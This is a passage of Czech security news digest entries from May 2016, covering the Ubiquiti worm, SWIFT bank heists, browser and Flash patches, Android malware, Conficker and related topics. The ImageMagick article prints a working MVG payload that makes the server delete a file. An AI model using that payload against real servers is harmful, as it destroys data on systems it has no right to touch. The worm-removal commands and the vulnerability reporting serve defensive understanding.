Především aktualizovat na firmware 5.6.5! Zároveň je dobré nasadit firewall na HTTP nebo HTTPS, stačí jej nastavit ve webovém rozhraní zařízení. Dále je možné nastavit naslouchání zařízení na jiný než výchozí port 80 či 443. Zkušenější samozřejmě mohou využít vlastních skriptů v ubnt.

Pokud už jste byli napadeni, můžete manuálně odstranit virus pomocí SSH:

# cd /etc/persistent/
# rm mf.tar
# rm rc.poststart
# rm -R .mf
# sed -i "/^mother/d" /etc/passwd
# cfgmtd -p /etc/ -w
# reboot
Doufám, že všichni stihnete aktualizovat dříve, než naši republiku pokryje Wi-Fi nápis „motherfucker“.


Hackeři zaútočili na další banku, získali její SWIFT kódy

15.5.2016 Hacking
Společnost pro celosvětovou mezibankovní finanční telekomunikaci (SWIFT) upozornila na nový kybernetický útok, který byl namířen proti nejmenované komerční bance. SWIFT, která dohlíží na mezinárodní peněžní transfery, proto vyzvala svoje klienty, aby neodkladně zkontrolovali svoje systémy zabezpečení.
Hackeři k útoku na program pro čtení PDF souborů použili malware, tedy software, jehož cílem je infiltrovat nebo zničit počítačový systém bez souhlasu uživatele. Útočníkům se prý podařilo rozesílat swiftové zprávy využívající kódy dotčené banky. SWIFT, která má sídlo v Belgii, ale neuvedla název banky ani to, zda nějaké peníze zmizely.

Systém SWIFT se používá k mezinárodnímu platebnímu styku. Každá banka má v rámci tohoto systému jedinečný kód, kterým se identifikuje. Systém využívá zhruba 11 000 finančních institucí po celém světě.

Soudní experti se podle organizace SWIFT domnívají, že použití malwaru není ojedinělý případ, "ale součást širší a velmi adaptivní kampaně cílící na banky".

Při útoku byly využity nástroje a techniky podobné těm, které byly využity při únorové krádeži 81 miliónů dolarů (1,9 miliardy Kč) z účtu bangladéšské centrální banky, vedeného u Federální rezervní banky (Fed) v New Yorku.

Bankéři chtěli ušetřit…
Vyšetřování této velké bankovní loupeže letos v dubnu ukázalo, že bankéři šetřili a nepoužívali firewall. Jinými slovy tak hackerům banka naservírovala peníze doslova na zlatém podnosu.

Firewall je síťové zařízení, které slouží k zabezpečení počítačových sítí. Jeho hlavním úkolem je tedy bránit počítače a servery v rámci dané sítě, aby se na ně nedostaly škodlivé viry a další nezvaní návštěvníci.

Podle vyšetřovatelů bylo zřejmé, že se lidé starající o miliardové transakce snažili ušetřit. Další síťová technika, kterou vyšetřovatelé kontrolovali, totiž byla pořízena z druhé ruky. Například nákupem síťových přepínačů z bazaru přitom banka ušetřila maximálně tak pár stovek dolarů.


Aktualizace opravují nebezpečné trhliny v Internet Exploreru i Windows

13.5.2016 Zranitelnosti
V rámci pravidelných měsíčních updatů vydala společnost Microsoft i záplaty pro chyby, které byly odhaleny v operačním systému Windows a webových prohlížečích Internet Explorer a Edge. S instalací aktualizací by lidé neměli otálet, protože opravují kritické zranitelnosti.
V produktech amerického softwarového gigantu bylo nalezeno dohromady sedm kritických chyb. Je velmi pravděpodobné, že po jejich oficiálním odhalení se je budou snažit zneužít počítačoví piráti.

Kromě operačního systému Windows a zmiňovaných webových prohlížečů byly stejně nebezpečné trhliny nalezeny také v kancelářském balíku Office. Jedna z trhlin se týká také enginu VBScript, tedy skriptovacího jazyku určeného ke vkládání kódu do webových stránek.

Rizika jsou velká
Jako kritické jsou vždy označovány chyby, jež mohou kyberzločinci zneužít k tomu, aby do počítače propašovali prakticky libovolného nezvaného návštěvníka.

Stačí jim k tomu vytvořit podvodnou internetovou stránku, prostřednictvím které vzdáleně spustí škodlivý kód. Touto cestou se mohou dostat k souborům uloženým na pevném disku i sestavu na dálku ovládnout.

Takový stroj se pak klidně i bez vědomí uživatele může stát součástí botnetu (síť zotročených počítačů), který kyberzločinci zpravidla zneužívají k rozesílání spamu nebo k DDoS útokům.

S instalací neotálet
Vedle updatů pro kritické bezpečnostní chyby vyšla řada aktualizací, které jsou označeny jako důležité. Ani s jejich instalací by uživatelé neměli otálet, protože mohou mít vliv na funkčnost samotného operačního systému Windows nebo některých programů.

Stahovat všechny opravy pro kritické a důležité trhliny, které vyšly společně s balíkem pravidelných běžných aktualizací, je možné prostřednictvím služby Windows Update.


Flash Player opět terčem útoků, Adobe varuje před kritickým zneužitím

12.5.2016 Zranitelnosti
Adobe Systems momentálně řeší kritickou zranitelnost ve Flash Playeru, kterou se již hackerům podařilo zneužít. Mezitím firma vydala opravy pro další zasažené aplikace, kterými jsou Reader, Acrobat a ColdFusion, na záplatě pro Flash Player se ale ještě pracuje.

Chyba je zaznamenaná jako CVE-2016.4117 a týká se verzí Flash Playeru 2.0.0.226 a starších pro Windows, OS X, Linux a Chrome OS. Úspěšné zneužití chyby umožňuje útočníkovi převzít vládu nad systémem.

„Adobe si je vědomo zpráv, že hack na CVE-2016-4117 existuje,“ píše společnost v článku zveřejněném v úterý. „Adobe tuto zranitelnost opraví v naší každoměsíční bezpečnostní aktualizaci, náplánované na 12. květen.“

V úterý také firma vydala balíček aktualizací pro Reader a Acrobat, které dohromady opraví 92 chyb. Většina z nich je hodnocená jako kritická.

Zranitelné verze zahrnují Acrobat DC a Reader DC 15.010.20060 a starší, 15.006.30121 a starší, a také Acrobat XI a Reader XI 11.0.15 a starší. Uživatelé si mohou produkt aktualizovat ručně kliknutím na „pomoc“ a následně „zkontrolovat dostupnost aktualizací“ v české verzi.

Firma také vydala aktualizace pro svůj ColdFusion aplikační server. Tyto aktualizace cílí na zranitelnost s ověřením validity vstupu, která mohla vést k mezistránkovým scripting útokům, na problém s ověřením host name, který způsoboval problém u wild card certifikátů, a na Java deserializační chybu v knihovně Apache Commons Collections.

Adobe radí uživatelům nainstalovat ColdFusion (verzi z roku 2016) Update 1, ColdFusion 11 Update 8 nebo ColdFusion 10 Update 19, podle toho, kterou vezi aplikace mají.

Instalace ColdFusion bývají cílem útočníků. V roce 2013 výzkumníci zjistili větší útok, kde hackeři zneužili zranitelností v ColdFusion a nainstalovali díky nim malware na IIS servery Microsoftu.


Fanoušky Androidu se pokusila podvést skupina zavirovaných Vikingů
12.5.2016
Mobilní

Před měsícem jsme si vyzkoušeli, jak principiálně funguje typický malware pro mobilní telefon, který jej skrze falešnou aplikaci a díky přemíře práv zapojí třeba do botnetu. Přesně tento typ aplikací trápí i Google a jeho katalog Play Store, protože se nejedná o viry v pravém slova smyslu, které by zneužívaly konkrétní zranitelnost v systému, a právě to by je odhalilo, ale jedná se vlastně o běžné aplikace, které jen po uživateli požadují maximum práv.

Google podobné programy dokáže automaticky filtrovat jen s obtížemi, a tak mu musejí pomáhat specialisté z bezpečnostních firem. Výzkumníci z Check Pointu například na začátku května odhalili sadu programů, kterou nazvali Viking Horde.

97427678
Podovodné programy ze sady Viking Horde

Na první pohled se jednalo o zcela běžné jednoduché hry a utility – třeba Viking Jump, nicméně aplikace dělaly i jiné kulišárny – prozradilo je třeba to, že chtěly na rootnutých telefonech provádět i nejrůznější operace s právy administrátora (základní bezpečnostní pravidlo říká, že by měl být na každém rootnutém telefonu správce, který vám oznámí, že chce aplikace provést nějakou root operaci a vyžaduje vaše svolení – podobně jako dialog UAC na Windows).

Ačkoliv byly Check Point aplikace odhalil docela brzy, během několika týdnů od publikace si je stáhly desítky tisíc uživatelů. Právě proto Google v Androidu 6 představil nový management práv a namísto odsouhlasení výčtu práv aplikace už při instalaci, se vás Android zeptá až v okamžiku, kdy je bude chtít aplikace použít, což může být pro zkušenější uživatelé otravné, ale pro ostatní spíše transparentnější, protože mohou lépe odhadnout, k čemu přesně daná aplikace práva potřebuje.


Kdo najde díru na Pornhubu, dostane až 25 tisíc dolarů
12.5.2016
Zabezpečení
Bezpečnost je na internetu velkou prioritou a na porno stránkách je neméně důležitá. Uživatelé jsou sice zvyklí vnímat erotické stránky jako zdroj podvodných inzerátů, které mohou nést malware, současně se ale provozovatelé placených serverů snaží ochránit své uživatele před únikem informací.

Pornhub, jeden z největších erotických serverů, proto nyní vypsal veřejnou soutěž, kde může kdokoli na serverech *.pornhub.com zkusit najít nějakou zranitelnost. Podmínkou je, že chybu musíte nahlásit do 24 hodin od objevení, nesmíte nic zničit, leda své vlastní účty a vše musíte pečlivě zdokumentovat.

Minimální odměna je 50 dolarů, maximální 25 000 dolarů podle závažnosti. Hodnocení, co je jak závažné je ale zcela na Pornhubu. platby jsou pak zprostředkované přes server HackerOne, který se právě na tento typ organizovaných akcí specializuje.


SWIFT odpovídá bankéřům: Za bezpečnost si zodpovídáte sami

12.5.2016 Zabezpečení
Bankovní systém s odstupem reaguje na zprávy o tom, že byla prolomeno jeho zabezpečení.
Systém, kterým komunikují banky po celém světě, se dosud pozornosti hackerů vyhýbal, ale to už teď neplatí. Podle bezpečnostních expertů byl poslední útok na účty bangladéšské centrální banku veden právě přes SWIFT.

Při útoku zmizelo 81 milionů dolarů a akce je označována za dosud největší kybernetickou zlodějnu. Sdružení SWIFT se ale brání nařčení, že jeho zabezpečení jeho systému bylo prolomeno. “SWIFT není a nemůže být odpovědný za vaše rozhodnutí ohledně výběru a implementace firewallů a vnitřní strukturu vašich sítí," zní v dopise, který rozeslalo vedení bankám.

Podle agentury Reuters bývalí zaměstnanci tvrdí, že taková upozornění banky dostávaly i v minulosti. Jen na ně příliš nereagovaly. SWIFT jako takový totiž negarantuje, že někdo nepovolaný nemůže získat přístup ke klientským klíčům. Tomu musí zabránit banky, které s přístupy operují.

Dnes SWIFT (Society for Worldwide Interbank Financial Telecommunication) používá kolem jedenácti tisíc bank a institucí po světě. Ne všechny ale využívají Alliance Access, který byl při útoku využitý.

S teorií, že za hackem stojí zmanipulovaný klient SWIFTu označovaný jako Alliance Access, přišlo britské BAE. Podle bezpečnostních expertů šlo o vysoce profesionální útok. Adrian Nish z BAE tvrdí, že takhle propracovaný model útoku ještě za svou kariéru nepotkal.


Opera nabízí VPN pro uživatele iPhonů zdarma -- i když ne tak úplně

12.5.2016 Zabezpečení
Služba sice skutečně zdarma bude, ale nejen, že je pravděpodobná přítomnost reklam, ale společnost bude prodávat anonymizované uživatelské informace. To ale může spoustu zájemců odradit.
Opera nabízí VPN pro uživatele iPhonů zdarma -- i když ne tak úplně

Opera Software včera uvlonila VPN aplikaci zdarma, určenou specificky pro iOS. Opera VPN, jak se služba nazývá, v základu spoléhá na stejnou společnost (kanadskou SurfEasy) jako desktopový Opera prohlížeč pro služby typu ukrývání lokace, zablokování online sledování či obcházení blacklistů spravovaných vládami, korporacemi a školami. SurfEasy norská Opera odkoupila v březnu tohoto roku.

U veřejných služeb, jako je např. Wi-Fi v kavárně, „VéPéEnka“ poskytuje zabezpečený „tunel“ k cíli, který uživatele ochraňuje před krádeží osobních informací a hesel.

Opera VPN je samostatnou službou, není dokonce ani integrována v iOS prohlížečích Opery, kterými jsou Opera Mini a Opera Coast.

Podobně jako u desktopové varianty Opery – konkrétně dubnového předběžného náhledu pro Windows, OS X a Linux, kde je již zahrnuta VPN – je i VPN na iOS zdarma jak ke stažení, tak k použití. Většina jiných VPN služeb od konkurentů požaduje měsíční nebo roční poplatky, které nebývají zrovna malé.

Ač je však Opera VPN na první pohled zdarma, firma se pro takové řešení nerozhodla z čistě šlechetných záměrů. Spoléhá se na dvě různé strategie výdělku.

Podle Chrise Houstona, ředitele SurfEasy, Opera bude do Opera VPN vkládat reklamy: Tuto možnost však prozatím objasnil jen jako „pravděpodobnou,“ spíše než jistou. „Ačkoliv tu prozatím reklamy nejsou, v budoucnu pravděpodobně budou do aplikace zavedeny,“ napsal v dlouhém sdělení na blogu firmy.

SurfEasy, nyní již divize Opera Software, bude také prodávat anonymizované „balíky“ dat, sesbíraných od uživatelů Opera VPN, popisuje Houston. „Tyto informace budou dostupné třetím stranám, které projeví zájem o lepší porozumění toho, jak funguje mobilní ekosystém a jak se rozvíjí.“

Data z placené VPN služby SurfEasy – ta si stále účtuje 6,49 dolarů měsíčně – a data těch, co používají desktopovou verzi VPN v prohlížeči Opera, k prodeji nejsou. Společnost si je totiž neukládá.

Houston také potvrdil spekulace: Opera přidala do desktopového prohlížeče VPN v pokusu zvýšit počty uživatelů. „Přidání VPN do desktopového prohlížeče Opera je pro Operu cesta, jak svůj prohlížeč odlišit a rozšířit tak svou uživatelskou základnu,“ uznává. V teorii platí, že čím víc uživatelů bude Opera mít, tím více peněz firma dostane od svých vyhledávacích partnerů, jimiž jsou např. Google či ruský Yandex. Tito partneři platí Opeře za to, že je má nastaveny jako základní vyhledávače ve svém prohlížeči.

Opera je pravidelně na spodní příčce v pěti nejpoužívanějších prohlížečích, a potřebuje svá čísla nutně zlepšit. Během dubna si Opera ukrojila 2% podíl ze všech uživatelů, alespoň podle americké analytické firmy Net Applications. Ač se takové číslo zdá zanedbatelné, jde o posun o osm desetin procenta oproti minulému roku, tedy o poměrně působivý 69% nárůst.

V porovnání s ostatními čtyřmi největšími hráči je však Opera benjamínkem. Google Chrome drží 41,7 % uživatelů, Internet Explorer a Edge dohromady 41,3 %, Mozilla Firefox 10,1 % a stabilní Safari do Applu je na 4,5% podílů uživatelů.

Opera VPN je ke stažení v App Storu.


Kaspersky Lab dokáže nově zabezpečit i průmyslové systémy

12.5.2016 Zabezpečení
Specializované bezpečnostní řešení pro ochranu kritické infrastruktury a zabezpečení průmyslových podniků představila včera v Praze firma Kaspersky Lab. KICS (Kaspersky Industrial CyberSecurity) podle tvůrců přináší jednotný přístup k IT bezpečnosti pro průmyslové podniky. Novinka přitom zabezpečuje ICS/SCADA servery, HMI panely a inženýrské pracovní stanice, PLC, aniž by nějak ovlivnilo plynulost a konzistenci provozu.

KICS je ve své podstatě kombinací běžných bezpečnostních technologií přizpůsobených pro potřeby průmyslových podniků. Obsahuje ochranu proti malwaru, whitelisting a funkci pro odhalování zranitelností.

To je ale rozšířené o technologie, které jsou speciálně navržené přímo pro průmyslová prostředí – jde o kontrolu integrity PLC programů (Integrity check for PLC programs), sémantický monitoring kontroly příkazů (Semantic monitoring of proces control commands) či telemetrická data (Telemetry data), která dokážou odhalit kybernetické útoky cílící na fyzické části infrastruktury.

Speciální režim Observability Mode se pak soustředí na odhalení kybernetických útoků, chyby provozního personálu a anomálie uvnitř průmyslové sítě. Centrální řídící panel pak umožňuje administrovat veškeré bezpečnostní prvky firmy Kaspersky Lab – tedy od antivirů až pro sofistikované systémy pro SCADA. Řešení lze prý implementovat i do už existující ICS sítě a technologického procesu dané organizace.

Dodavatel navíc ke KICS poskytuje celou řadu doprovodných služeb včetně kyberbezpečnostních školení (cybersecurity training) pro IT profesionály či vzdělávacích programů pro běžné zaměstnance nebo penetrační testování (Cyber Security and Penetration Testing).

Další služba -- Incident Response -- podle jejích dodavatelů pomáhá lokalizovat narušení sítě, zmírnit následky, zamezit útočníkům hlouběji proniknout do infrastruktury, předcházet dalším útokům a rozvíjet krizový plán do budoucnosti.


Už je to evergreen: V IE a Flash Playeru jsou kritické chyby. Mějte aktualizovaný systém
11.5.2016 Zdroj: Zive.cz
Zranitelnosti

Microsoft včera vypustil do internetového éteru další várku pravidelných měsíčních záplat (patch tuesday), která tentokrát obsahovala i opravu kritické chyby CVE-2016-0189. Ačkoliv se ji snažil Microsoft udržet do vydání opravy v relativní tajnosti, kyberscéna o ní dobře věděla. Podle Symantecu potěšila třeba hackery v Jižní Koreji.

562427339

Bug v Internet Exploreru (ilustrační obrázek)

A o co vlastně šlo? O další kritickou chybu v Internet Exploreru – ano, už jej opravdu přestaňte používat. Konkrétně se jednalo o zranitelnost v jeho jádře pro běh Javascriptu (JScript 5.8) a VBS (VBScript 5.7-8), která se týkala verzí IE 9 a vyšších a všech programů, které používaly komponentu IE. Umožňovala spuštění zákeřného kódu.

Pokud jste se ale právě ušklíbli, že IE přeci vůbec nepoužíváte a vlastně ani Windows, raději nepoužívejte ani Flash Player, jednu kritickou chybu totiž včera oznámila i společnost Adobe. Zranitelnost CVE-2016-4117 v jeho Flash Playeru 21.0.0.226 a nižším se týká všech podporovaných platforem a útočník ji může zneužít k pádu aplikace, případně opět ke spuštění záškodnického kódu.

Podobné díry tu byly, jsou a budou, protože kód softwaru je stále komplikovanější a lidé prostě dělají chyby od chvíle, co slezli z afrických stromů, nicméně čím méně proprietárních technologií budeme na webu používat, tím nad ním budeme držet větší kontrolu. Nelze tedy než doufat v to, že stárnoucí Flash Player co nevidět konečně nahradí HTML a Javascript.


Nebezpečný spam terorizuje už i uživatele Skypu

10.5.2016 Spam
Škodlivé odkazy na nejrůznější viry a trojské koně jsou dnes již běžně šířeny přes e-maily a sociální sítě. Nově se je počítačoví piráti snaží uživatelům podstrčit také v komunikačním programu Skype. Před novou hrozbou varovala bezpečnostní společnost Malwarebytes Labs.
Komunikační program Skype

Komunikační program Skype
Útok má prakticky vždy stejný scénář. Kyberzločinci se nejprve nabourají do cizího počítače, kde získají přístup ke Skypu. Z něho poté rozesílají prakticky všem možným kontaktům nevyžádané zprávy s odkazem na podvodné stránky. Ten je zpravidla ještě doplněn informací, že se jedná o zábavné fotografie či nějaké pikantní video.

Z řádků výše je patrné, že tyto spamové zprávy mohou přijít od skutečných kontaktů, které lidé znají. Ani v takovém případě by se neměli nechat napálit, na odkaz nesmějí v žádném případě klikat.

Pokud to udělají, budou přesměrováni na podvodný web, kde na ně číhá škodlivý kód. Stačí kliknout na jakoukoliv část internetové stránky a na uživatele prakticky okamžitě vyskočí hláška o nutnosti instalace nějakého programu.

Šířit mohou prakticky jakýkoliv virus
To počítačoví piráti ospravedlňují zpravidla tak, že bez příslušného programu nepůjde video na podvodném webu přehrát. Instalací tohoto programu si samozřejmě uživatelé nevědomky pustí do svého systému nezvaného návštěvníka.

Přes odkazy ve Skypu mohou kyberzločinci šířit prakticky jakékoliv škodlivé kódy. Mohou tak snadno odposlouchávat komunikaci na cizím počítači nebo například vybílit jejich bankovní účet. Hrozbu se tedy rozhodně nevyplatí podceňovat.

Je však nutné zmínit, že podobné praktiky zkoušejí počítačoví piráti hlavně v Indii, Japonsku a na Filipínách. To samozřejmě ale neznamená, že by nevyžádané zprávy na Skypu nemohli v nadcházejících dnech obdržet i tuzemští uživatelé.


Populární linuxový ImageMagick je děravý jako ementál. Drobným hackem jsme smazali soubory
10.5.2016 Zdroj: Zive.cz
Zranitelnosti

Hromada webových služeb běžících na linuxovém serveru používá k operacím s obrázky nástroje z balíku ImageMagick. Ty mohou třeba ořezávat a generovat fotografie, provádět jejich konverzi mezi formáty aj. Takovým typickým příkladem použití by mohla být třeba práce s úpravou profilové fotografie uživatele na nějakém webu.

ImageMagick je rychlý a mocný, nabízí totiž obrovské množství konverzních funkcí včetně generování animovaných gifů aj. Jenže kvůli této komplexnosti obsahuje také hromadu kritických chyb (CVE-2016-3714), na které nyní upozornil třeba docela adekvátně pojmenovaný web ImageTragick.

Díky těmto zranitelnostem lze poměrně snadno zneužít konverzní funkce ImageMagicku k nejrůznějším operacím v systému. Pokud například ImageMagick dostane za úkol převést grafiku ve formátu SVG, MVG aj. do něčeho jiného – třeba do rastru PNG, může vstupní soubor obsahovat příkazy, které povedou ke smazání nějakého souboru (pokud na to bude mít ImageMagick práva), ke spuštění příkazu, zavolání HTTP GET, stažení zákeřného kódu z webu aj.

Okamžitě po zveřejnění tedy hackeři vytvořili zákeřné obrázky, které zkoušejí nahrávat na nejrůznější weby, které pracují s grafikou a ví se, že používají ImageMagick. Některé velké hostingové/CDN systémy jako třeba CloudFlare a další už na tyto útoky pamatují ve svých firewallech.

Příklad útoku pomocí zákeřného obrázku

Jak může být takový útok snadný, ukážeme v příkladu níže.

Nejprve si vytvořím zákeřný soubor smazat.mvg v textovém formátu MVG (Magick Vector Graphics):

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'ephemeral:/tmp/pokus.txt'
popgraphic-context
Soubor obsahuje textové instrukce k vytvoření plátna o velikost 640×480 pixelů, na které se má vykreslit na pozici 0;0 obrázek ze souboru /tmp/pokus.txt. Před adresou souboru je ale klíčové slovo ephemeral, které ImageMagicku říká, aby tento soubor poté smazal.

Problém spočívá v tom, že se vůbec nejedná o obrázek, ale že to může být vlastně jakýkoliv soubor, k jehož smazání bude mít proces ImageMagicku právo.

Pokud bych takový soubor poté nahrál na nějakou službu s ImageMagickem, který se na serveru pokusí o konverzi do nějakého jednotného formátu, třeba PNG, provedl by podobnou operaci takto:

convert smazat.mvg smazat.png
V rámci zpracovávání souboru smazat.mvg by pak ImageMagick smazal soubor /tmp/smazat.txt

799742791
ImageMagick je velmi snadno zneužitelný k nekalým operacím

Další příklady primitivních a o to nejbezpečnějších útoků najdete na webu ImageTragick, který zároveň nabízí rady, jak balík aktuálně co nejlépe zabezpečit.


Trojský kůň krade v mobilech informace o kreditních kartách. Útočí i v Česku

10.5.2016 Viry
Národní bezpečnostní tým CSIRT.CZ varoval v úterý před novým trojským koněm, který krade informace o platebních kartách. Zaměřuje se přitom výhradně na chytré telefony s operačním systémem Android. V ohrožení jsou i čeští uživatelé.
„Česká republika je na seznamu čtyř zemí, jejichž uživatelé OS Android byli v průběhu uplynulých měsíců nejvíce infikováni trojským koněm, který umožňuje získat administrátorská práva a veškeré informace o zařízení posílat na server,“ uvedl Pavel Bašta, bezpečnostní analytik CSIRT.CZ, který je provozován sdružením CZ.NIC.

Podle něj mohou útočníci snadno získat i informace o platebních kartách. „Při zadání příkazu je tento malware schopen zobrazit falešné okno, které vypadá jako okno aplikace Google Play (oficiální internetový obchod s programy Googlu, pozn. red.) a požadovat informace o kreditní kartě,“ konstatoval Bašta.

Touto cestou mohou celkem snadno připravit počítačoví piráti důvěřivce o peníze.

Hrozba je o to závažnější, že na chytrých telefonech a tabletech nepoužívá většina lidí žádný bezpečnostní software. „Uživatelé tohoto operačního systému by na svých zařízeních určitě měli mít instalovaný anti-malware a dělat pravidelné zálohy,“ podotkl bezpečnostní analytik CSIRT.CZ.

Škodlivých kódů pro mobily přibývá
Nárůst mobilních hrozeb je v posledních měsících stále patrnější. „V únoru se vůbec poprvé dostal do Top 10 škodlivých kódů mobilní malware, v březnu trend pokračoval,“ podotkl David Řeháček, bezpečnostní odborník ze společnosti Check Point.

Podle něj dělá bezpečnostním expertům v současnosti velké vrásky na čele především hrozba zvaná HummingBad. 

HummingBad se může šířit jako příloha nevyžádaného e-mailu, stejně tak ale může číhat na podvodných webech. Na smartphonech s operačním systémem Android vytváří trvalý rootkit, může se tedy v zařízení maskovat, což velmi znesnadňuje možnost jeho odhalení na napadeném zařízení. Ve chvíli, kdy se HummingBad na mobilním zařízení zahnízdí, začne dál škodit.


Největší hackerský útok se patrně nekonal. Šlo o podvod

9.5.2016 Podvod
Na konci minulého týdne obletěla svět zpráva, že ruský počítačový pirát se snaží prostřednictvím internetu rozprodat přinejmenším 272 miliónů přihlašovacích údajů k e-mailovým schránkám různých poskytovatelů. Dotčené společnosti však tvrdí, že o největší hackerský útok nejde ani náhodou – šlo prý jednoduše o podvod.
Únik bezmála tří stovek miliónů hesel se měl týkat především služeb Hotmail, Yahoo Mail, Gmail a Mail.ru. 

Provozovatelé posledních tří jmenovaných služeb se již podle serveru Cnet nechali slyšet, že se uživatelé nemají čeho obávat. Většina zveřejněných dat podle nich totiž není platná, tedy že k uváděným e-mailům daná hesla vůbec nepatří.

Tak velký únik je nesmysl
Troy Hunt, bezpečnostní výzkumník společnosti Microsoft, celý hackerský útok označuje na svých webových stránkách věnovaných z velké části bezpečnosti na síti jednoduše za podvod.

Podle něj je velmi nepravděpodobné, že by takové množství hesel mohlo uniknout. A pokud by se tak skutečně stalo, šlo by o databázi v zašifrované podobně – ruský hacker přezdívaný Collector (Sběratel) je přitom nabízel nezašifrovaná.

Otazníky budil údajně největší hackerský útok prakticky hned po svém odhalení. Bezpečnostní výzkumníci upozorňovali na to, že takové množství údajů nemohl jeden člověk nasbírat sám. Tehdy se nabízela myšlenka, že Collector velkou část hesel pouze posbíral z jiných útoků svých kolegů.

Byl e-mail v minulosti napaden?
Uživatelé dotčených e-mailových služeb se tak podle všeho nemají čeho obávat. Zda nebyl jejich e-mailový účet v minulosti – tedy nejen při největším hackerském útoku – napaden, si mohou ověřit například na stránkách haveibeenpwned.com.

Na nich stačí vyplnit pouze svůj e-mail, který se následně porovnává s databází ukradených hesel. Pokud je v nich uživatelský e-mail objeven, je uživatel vyzván ke změně hesla. Databáze se neustále aktualizuje a obsahuje údaje i z jiných hackerských útoků.

Samozřejmě tato metoda ověření není stoprocentní. Pokud bezpečnostní experti nezvládli ještě odcizená hesla zpracovat, v databázi se e-mailová schránka neobjeví.


Na hackery si došlápnou i vojenští zpravodajci

9.5.2016 Bezpečnost
Konflikty na Ukrajině a v Sýrii ukazují, že útok hackerů může ohrozit obranu státu stejně jako cizí armáda. Vojáci kybernetickou válku už zařadili na roveň pozemním a leteckým operacím.
Podle informací Práva už začali zpravodajci budovat v Praze centrálu, z níž budou sledovat podezřelé pohyby na síti. Ilustrační snímek
Zbraně proti hackerům mají po policii nově získat i armádní špióni. Ti by podle novely zákona o Vojenském zpravodajství, které ministerstvo obrany už poslalo do připomínkového řízení, měli dostat možnost používat např. sledování a odposlouchání i na poli kybernetické obrany.

Návrh zákona nařizuje pod hrozbou finanční sankce operátorům a poskytovatelům internetu umožnit armádním špiónům napojit se na počítačovou síť a monitorovat ji. Za tuto službu a za poskytnutá data by měla obrana platit.

Podle informací Práva už začali zpravodajci budovat v Praze centrálu, z níž budou sledovat podezřelé pohyby na síti. V případě, že zjistí nepravosti, budou moci proti hackerům zasáhnout.

„Konkrétní nasazování a používání technických prostředků bude stanovovat vláda jako kolektivní orgán, čímž bude zajištěna nezbytná míra kontroly nad činností Vojenského zpravodajství v této oblasti,“ stojí v materiálu.

Útočníky odstřihnou
Jaké konkrétní prostředky budou moci zpravodajci nasadit, obrana z bezpečnostních důvodů nezmiňuje, aby neodkryla své slabiny. Je ale jasné, že v případě podezření budou zpravodajci moci sledovat nejen formální znaky datového toku, ale i jeho obsah.

V nedávném rozhovoru pro Právo šéf Vojenského zpravodajství Jan Beroun naznačil, co jeho podřízení budou dělat.

„Nejdříve budeme muset poznat, jací jsou protivníci a jaké mají chování. Nejjednodušší obrana samozřejmě je, že budeme mít schopnost vypnout elektronický tok, odkud útok bude přicházet. Ale musíme mít dopředu analyzované, jaké dopady takový krok bude mít, aby nepřinášel větší škody než samotný útok,“ prohlásil Beroun.

Dodal, že ochrana by se měla týkat především útoků, které „míří na srdce, na klíčové systémy státu“, a to nejen ministerstva, ale třeba i na jaderné elektrárny.

Také počítačový odborník Tomáš Přibyl předpokládá, že zpravodajci dostanou možnost útočníky odpojit. „Určitě budou mít možnost zjistit maximum informací o zdroji i o detailech komunikace, aby útok mohli odrazit, tedy odstřihnout od sítě,“ řekl Právu Přibyl, který v Řitce u Prahy provozuje výcvikové centrum proti kybernetickým útokům.

Neumím si představit, že by vláda byla tak rychlá, aby se v případě potřeby okamžitě sešla, aby věc schválila
Andor Šándor, bývalý šéf vojenských zpravodajců
Podle odborníků jde zákon dobrým směrem, ale může přinést řadu komplikací a pokušení. „Těžko něco proti takovému návrhu namítat,“ řekl Právu bývalý šéf vojenských zpravodajců Andor Šándor. Podle něj ale zní alibisticky ustanovení, kdy by o použití technických prostředků k zabránění kyberútoku měla rozhodovat vláda.

„Neumím si představit, že by vláda byla tak rychlá, aby se v případě potřeby okamžitě sešla, aby věc schválila,“ uvedl. Expert na kybernetickou bezpečnost Vladimír Lazecký má obavy, aby špióni nedostali větší pravomoci, než potřebují.

„Tento návrh mi nevadí, ale za velmi nebezpečné bych považoval to, o co se snaží v USA či v Británii, kdy nutí lidi, kteří si komunikaci šifrují, aby jim poskytli dešifrovací klíče, a když to neudělají, tak je kriminalizují,“ řekl Právu.

Dnes má podle zákona na starosti kybernetickou bezpečnost Národní bezpečnostní úřad (NBÚ). V Brně provozuje centrum, které pomáhá státním institucím i důležitým podnikům bojovat proti hackerům.

Podle mluvčího NBÚ Radka Holého nevnímají plány resortu obrany jako konkurenci. „Určitě to nebude kolidovat. Od počátku jsme s obranou ve spojení a pomáháme si,“ sdělil Právu.


Nejrozšířenější počítačová hrozba dělá expertům vrásky na čele. Znovu

8.5.2016 Viry
Bezpečnostním expertům dělá opět vrásky na čele zákeřný červ Conficker. Ten koluje internetem už od konce roku 2008, přesto se jeho aktualizované verzi podařilo v prvním čtvrtletí letošního roku opět dostat až na samotný vrchol žebříčku nejrozšířenějších počítačových hrozeb. Vyplývá to z analýzy bezpečnostní společnosti Check Point.
Conficker byl nejrozšířenější hrozbou prakticky po celý rok 2009, pak se po něm slehla na několik měsíců zem. V letošním roce jej ale počítačoví piráti začali opět hojně využívat, díky čemuž se z něj stala nejrozšířenější hrozba, a to v tuzemsku i zahraničí.

V současnosti je tento červ zodpovědný za každý pátý útok na síti. Je tedy dvakrát rozšířenější než druhá nejrozšířenější hrozba – virus Sality, který umožňuje útočníkům vzdálené ovládání napadeného stroje a instalaci dalších nezvaných návštěvníků. Sality byl v minulých měsících zodpovědný za každý desátý útok.

Conficker využívá zranitelnost operačního systému Windows. Pro tu už dávno existuje bezpečnostní záplata, ale jak je ze statistik zřejmé, s její instalací si velká část uživatelů hlavu neláme. Na konci dubna se dokonce ukázalo, že se tento nebezpečný červ uhnízdil v počítačích v bavorské jaderné elektrárně Gundremmingen. 

Autoři Confickera vybudovali po celém světě velkou síť infikovaných PC, využitelných na libovolnou úlohu, poněvadž počítače mohou díky viru ovládat na dálku. Na jeho řízení použili autoři červa inovativní způsob. Každý den se vygenerují nové náhodné domény, kam se vir hlásí a žádá instrukce.

Dokáže zablokovat antiviry
Tím prakticky bezpečnostním expertům znemožňují, aby mohli Confickera zcela vyřadit z provozu. Většina antivirových programů by si nicméně i s tou nejnovější verzí měla poradit.

V některých případech ale prostřednictvím červa dovedou bezpečnostní programy v počítači odhalit. Pak mohou s jeho vystopováním pomoci nejrůznější on-line antivirové skenery.

